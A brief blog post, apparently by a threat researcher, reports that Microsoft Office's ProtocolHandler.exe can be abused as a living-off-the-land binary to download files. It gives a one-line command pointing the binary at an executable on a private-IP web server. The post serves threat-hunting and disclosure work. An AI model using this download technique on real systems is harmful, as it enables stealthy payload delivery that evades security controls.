LOLbin — ProtocolHandler.exe

Reegun J
1 min readJan 28, 2020

#Notes:

During threat hunting for LOLbins, I came across Protocolhandler.exe

Protocolhandler.exe is a binary meant for handling URI scheme based Microsoft Office files.

I fuzzed the possibilities of LOLbin and found that, It can be used to download payloads.

command:

C:\[office installed folder]\root\[version]\ protocolhandler.exe “http://192.168.1.111/cmd.exe”

https://www.youtube.com/watch?v=eUTFeRwZxH0

https://twitter.com/reegun21/status/1220561299009990656

--

--

Reegun J

#800080 Teamer | Threat Researcher | Malware analyst | Reverse Engineer